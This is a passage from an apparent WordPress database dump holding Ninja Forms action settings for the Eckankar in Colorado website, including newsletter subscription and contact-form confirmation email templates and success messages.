Submission'),(1745,67,'email_message','{fields_table}','email_message','{fields_table}'),(1746,67,'email_message_plain','','email_message_plain',''),(1747,67,'from_name','','from_name',''),(1748,67,'from_address','','from_address',''),(1749,67,'email_format','html','email_format','html'),(1750,67,'cc','','cc',''),(1751,67,'bcc','','bcc',''),(1752,67,'redirect_url','','redirect_url',''),(1753,67,'submitter_email','','submitter_email',''),(1754,67,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(1755,67,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(1756,67,'set_subs_to_expire','0','set_subs_to_expire','0'),(1757,67,'subs_expire_time','90','subs_expire_time','90'),(1758,67,'success_msg','<div style=\"text-align: center\">&nbsp;</div><h2 style=\"text-align: center\"><span style=\"color: #23507d; font-size: 34pt;\"><strong>Thank you for subscribing to the Eckankar in Colorado Members Newsletter!</strong></span></h2><div style=\"text-align: center; font-size: 18pt;\">&nbsp;You will be receiving an email confirmation of your subscription(s) and your newsletter(s) will arrive in your email inbox very soon.</div><div style=\"text-align: center\">&nbsp;</div><div style=\"text-align: center\"><br> <em>The Eckankar in Colorado Newsletter Team</em></div><div style=\"text-align: center\">&nbsp;</div>','success_msg','<div style=\"text-align: center\">&nbsp;</div><h2 style=\"text-align: center\"><span style=\"color: #23507d; font-size: 34pt;\"><strong>Thank you for subscribing to the Eckankar in Colorado Members Newsletter!</strong></span></h2><div style=\"text-align: center; font-size: 18pt;\">&nbsp;You will be receiving an email confirmation of your subscription(s) and your newsletter(s) will arrive in your email inbox very soon.</div><div style=\"text-align: center\">&nbsp;</div><div style=\"text-align: center\"><br> <em>The Eckankar in Colorado Newsletter Team</em></div><div style=\"text-align: center\">&nbsp;</div>'),(1759,67,'order','1','order','1'),(1760,67,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1761,67,'message','Your form has been successfully submitted.','message','Your form has been successfully submitted.'),(1762,67,'label','Success Message','label','Success Message'),(1763,67,'editActive','','editActive',''),(1764,67,'objectDomain','actions','objectDomain','actions'),(1765,67,'objectType','Action','objectType','Action'),(1766,67,'parent_id','17','parent_id','17'),(1767,68,'title','','title',''),(1768,68,'key','','key',''),(1769,68,'type','email','type','email'),(1770,68,'active','1','active','1'),(1771,68,'created_at','2019-02-13 13:53:21','created_at','2019-02-13 13:53:21'),(1772,68,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1773,68,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(1774,68,'payment_gateways','','payment_gateways',''),(1775,68,'payment_total','0','payment_total','0'),(1776,68,'tag','','tag',''),(1777,68,'to','{field:email_1550094081455}','to','{field:email_1550094081455}'),(1778,68,'reply_to','','reply_to',''),(1779,68,'email_subject','Eckankar In Colorado - MEMBERS Newsletter','email_subject','Eckankar In Colorado - MEMBERS Newsletter'),(1780,68,'email_message','<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td style=\"padding-top: 2px\" width=\"100%\" valign=\"top\" bgcolor=\"#cccccc\"><!-- Start Header--><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td width=\"100%\" height=\"102\" bgcolor=\"#cccccc\"><!-- Logo --><table class=\"deviceWidth\" width=\"478\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"left\"><tbody><tr><td class=\"center\" style=\"padding-left: 10px;color: #23507d\" width=\"478\" height=\"102\"><p style=\"font-size: 20pt;letter-spacing: .05em\"><strong>Eckankar In Colorado<br></strong><b>Member</b> Newsletter Subscription<em><br></em></p><p style=\"color: #333333;font-size: 14pt;letter-spacing: 0.03em;line-height: 10px\"><strong><em> Your Newsletter Subscription Confirmation</em></strong></p></td></tr></tbody></table><!-- End Logo --> <!-- Nav --><!-- End Nav --></td></tr></tbody></table><!-- End Header --> <!-- One Column --><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" bgcolor=\"#eeeeed\" align=\"center\"><tbody><tr><td style=\"padding: 3px;background-color: #23507d\" valign=\"top\"> </td></tr><tr>  <td style=\"font-size: 13px;color: #333333;font-weight: normal;text-align: left;font-family: Georgia, Times, serif;line-height: 24px;vertical-align: top;padding: 2px 10px 0px 8px\" bgcolor=\"#eeeeed\"><p style=\"font-size: 14px\"><strong>Hello  {field:firstname_1550094074971}!</strong><br><strong> Thank You For Subscribing!</strong></p><p>We\'re happy that you have signed up to receive the Eckankar in Colorado MEMBERS Newsletter(s). You will find each publication filled with all the latest news and events for the entire state. The most current edition will be in your inbox soon!</p><p>You have subscribed to the following newsletter(s):</p><p><b>{field:choose_your_subscription_s_1550099095640} </b><br></p><p></p><p>Happy to have you on board.</p><p>Warm Regards,<br> <em>The Eckankar in Colorado Newsletter Team</em></p></td></tr></tbody></table><!-- End One Column --><!-- spacer --> <!-- 2 Column Images & Text Side by SIde --><!-- End 2 Column Images & Text Side by SIde --><!-- spacer --> <!-- Two Column (Images Stacked over Text) --><!-- End Two Column (Images Stacked over Text) --><!-- spacer --> <!-- Dark Background, Three Column Images --> <!-- 3 Small Images --><!-- End 3 Small Images --> <!-- Dark Background, Three Column Images --><!-- spacer --> <!-- 2 Column Images - text left --><!-- End 2 Column Images  - text left --><div style=\"height: 6px\"> </div><!-- spacer --> <!-- Blog Headlines --><!-- end blog headlines --> <!-- 4 Columns --><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td style=\"padding: 12px 0\" bgcolor=\"#363636\"><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td><table class=\"deviceWidth\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"left\"><tbody><tr><td class=\"center\" style=\"font-size: 10pt;color: #999;font-family: Arial, sans-serif;padding-bottom: 0px\" valign=\"top\" height=\"50\"><p>You are receiving this email because you subscribed via <a href=\"https://www.eckankar-colorado.org\" style=\"color: #999;text-decoration: underline\"> The Eckankar in Colorado Website</a></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table><!-- End 4 Columns --></td></tr></tbody></table><br>','email_message','<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td style=\"padding-top: 2px\" width=\"100%\" valign=\"top\" bgcolor=\"#cccccc\"><!-- Start Header--><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td width=\"100%\" height=\"102\" bgcolor=\"#cccccc\"><!-- Logo --><table class=\"deviceWidth\" width=\"478\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"left\"><tbody><tr><td class=\"center\" style=\"padding-left: 10px;color: #23507d\" width=\"478\" height=\"102\"><p style=\"font-size: 20pt;letter-spacing: .05em\"><strong>Eckankar In Colorado<br></strong><b>Member</b> Newsletter Subscription<em><br></em></p><p style=\"color: #333333;font-size: 14pt;letter-spacing: 0.03em;line-height: 10px\"><strong><em> Your Newsletter Subscription Confirmation</em></strong></p></td></tr></tbody></table><!-- End Logo --> <!-- Nav --><!-- End Nav --></td></tr></tbody></table><!-- End Header --> <!-- One Column --><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" bgcolor=\"#eeeeed\" align=\"center\"><tbody><tr><td style=\"padding: 3px;background-color: #23507d\" valign=\"top\"> </td></tr><tr>  <td style=\"font-size: 13px;color: #333333;font-weight: normal;text-align: left;font-family: Georgia, Times, serif;line-height: 24px;vertical-align: top;padding: 2px 10px 0px 8px\" bgcolor=\"#eeeeed\"><p style=\"font-size: 14px\"><strong>Hello  {field:firstname_1550094074971}!</strong><br><strong> Thank You For Subscribing!</strong></p><p>We\'re happy that you have signed up to receive the Eckankar in Colorado MEMBERS Newsletter(s). You will find each publication filled with all the latest news and events for the entire state. The most current edition will be in your inbox soon!</p><p>You have subscribed to the following newsletter(s):</p><p><b>{field:choose_your_subscription_s_1550099095640} </b><br></p><p></p><p>Happy to have you on board.</p><p>Warm Regards,<br> <em>The Eckankar in Colorado Newsletter Team</em></p></td></tr></tbody></table><!-- End One Column --><!-- spacer --> <!-- 2 Column Images & Text Side by SIde --><!-- End 2 Column Images & Text Side by SIde --><!-- spacer --> <!-- Two Column (Images Stacked over Text) --><!-- End Two Column (Images Stacked over Text) --><!-- spacer --> <!-- Dark Background, Three Column Images --> <!-- 3 Small Images --><!-- End 3 Small Images --> <!-- Dark Background, Three Column Images --><!-- spacer --> <!-- 2 Column Images - text left --><!-- End 2 Column Images  - text left --><div style=\"height: 6px\"> </div><!-- spacer --> <!-- Blog Headlines --><!-- end blog headlines --> <!-- 4 Columns --><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td style=\"padding: 12px 0\" bgcolor=\"#363636\"><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td><table class=\"deviceWidth\" width=\"580\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"><tbody><tr><td><table class=\"deviceWidth\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"left\"><tbody><tr><td class=\"center\" style=\"font-size: 10pt;color: #999;font-family: Arial, sans-serif;padding-bottom: 0px\" valign=\"top\" height=\"50\"><p>You are receiving this email because you subscribed via <a href=\"https://www.eckankar-colorado.org\" style=\"color: #999;text-decoration: underline\"> The Eckankar in Colorado Website</a></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table><!-- End 4 Columns --></td></tr></tbody></table><br>'),(1781,68,'label','Send copy to user','label','Send copy to user'),(1782,68,'editActive','','editActive',''),(1783,68,'objectDomain','actions','objectDomain','actions'),(1784,68,'objectType','Action','objectType','Action'),(1785,68,'drawerDisabled','','drawerDisabled',''),(1786,68,'bcc','','bcc',''),(1787,68,'email_format','html','email_format','html'),(1788,68,'cc','','cc',''),(1789,68,'email_message_plain','','email_message_plain',''),(1790,68,'from_name','','from_name',''),(1791,68,'from_address','','from_address',''),(1792,68,'parent_id','17','parent_id','17'),(1793,69,'title','','title',''),(1794,69,'key','','key',''),(1795,69,'type','save','type','save'),(1796,69,'active','1','active','1'),(1797,69,'created_at','2018-01-03 11:43:16','created_at','2018-01-03 11:43:16'),(1798,69,'label','Save Form','label','Save Form'),(1799,69,'objectType','Action','objectType','Action'),(1800,69,'objectDomain','actions','objectDomain','actions'),(1801,69,'editActive','','editActive',''),(1802,69,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1803,69,'payment_gateways','','payment_gateways',''),(1804,69,'payment_total','0','payment_total','0'),(1805,69,'tag','','tag',''),(1806,69,'to','{wp:admin_email}','to','{wp:admin_email}'),(1807,69,'reply_to','','reply_to',''),(1808,69,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1809,69,'email_message','{fields_table}','email_message','{fields_table}'),(1810,69,'email_message_plain','','email_message_plain',''),(1811,69,'from_name','','from_name',''),(1812,69,'from_address','','from_address',''),(1813,69,'email_format','html','email_format','html'),(1814,69,'cc','','cc',''),(1815,69,'bcc','','bcc',''),(1816,69,'redirect_url','','redirect_url',''),(1817,69,'parent_id','18','parent_id','18'),(1818,70,'title','','title',''),(1819,70,'key','','key',''),(1820,70,'type','email','type','email'),(1821,70,'active','1','active','1'),(1822,70,'created_at','2018-01-03 11:43:16','created_at','2018-01-03 11:43:16'),(1823,70,'date_updated','2016-01-15','date_updated','2016-01-15'),(1824,70,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(1825,70,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1826,70,'to','{field:email_71}','to','{field:email_71}'),(1827,70,'email_subject','Northwest Colorado Leadership Communications','email_subject','Northwest Colorado Leadership Communications'),(1828,70,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_69},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Northwest Colorado Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_69}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_70}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_71}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_72}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_73}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_76}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_77}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_69},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Northwest Colorado Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_69}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_70}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_71}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_72}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_73}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_76}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_77}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(1829,70,'attach_csv','0','attach_csv','0'),(1830,70,'email_format','html','email_format','html'),(1831,70,'reply_to','','reply_to',''),(1832,70,'cc','','cc',''),(1833,70,'bcc','','bcc',''),(1834,70,'redirect_url','','redirect_url',''),(1835,70,'success_msg','','success_msg',''),(1836,70,'label','Send copy to user','label','Send copy to user'),(1837,70,'objectType','Action','objectType','Action'),(1838,70,'objectDomain','actions','objectDomain','actions'),(1839,70,'editActive','','editActive',''),(1840,70,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1841,70,'payment_gateways','','payment_gateways',''),(1842,70,'payment_total','0','payment_total','0'),(1843,70,'tag','','tag',''),(1844,70,'email_message_plain','','email_message_plain',''),(1845,70,'parent_id','18','parent_id','18'),(1846,71,'title','','title',''),(1847,71,'key','','key',''),(1848,71,'type','successmessage','type','successmessage'),(1849,71,'active','1','active','1'),(1850,71,'created_at','2018-01-03 11:43:16','created_at','2018-01-03 11:43:16'),(1851,71,'date_updated','2016-01-15','date_updated','2016-01-15'),(1852,71,'from_name','','from_name',''),(1853,71,'from_address','','from_address',''),(1854,71,'to','{wp:admin_email}','to','{wp:admin_email}'),(1855,71,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1856,71,'email_message','{fields_table}','email_message','{fields_table}'),(1857,71,'attach_csv','0','attach_csv','0'),(1858,71,'email_format','html','email_format','html'),(1859,71,'reply_to','','reply_to',''),(1860,71,'cc','','cc',''),(1861,71,'bcc','','bcc',''),(1862,71,'redirect_url','','redirect_url',''),(1863,71,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>'),(1864,71,'label','Success Message','label','Success Message'),(1865,71,'objectType','Action','objectType','Action'),(1866,71,'objectDomain','actions','objectDomain','actions'),(1867,71,'editActive','','editActive',''),(1868,71,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1869,71,'payment_gateways','','payment_gateways',''),(1870,71,'payment_total','0','payment_total','0'),(1871,71,'tag','','tag',''),(1872,71,'email_message_plain','','email_message_plain',''),(1873,71,'parent_id','18','parent_id','18'),(1874,72,'title','','title',''),(1875,72,'key','','key',''),(1876,72,'type','email','type','email'),(1877,72,'active','1','active','1'),(1878,72,'created_at','2018-01-03 11:43:16','created_at','2018-01-03 11:43:16'),(1879,72,'date_updated','2016-01-19','date_updated','2016-01-19'),(1880,72,'from_name','Northwest Colorado Leadership Communications','from_name','Northwest Colorado Leadership Communications'),(1881,72,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1882,72,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(1883,72,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(1884,72,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" 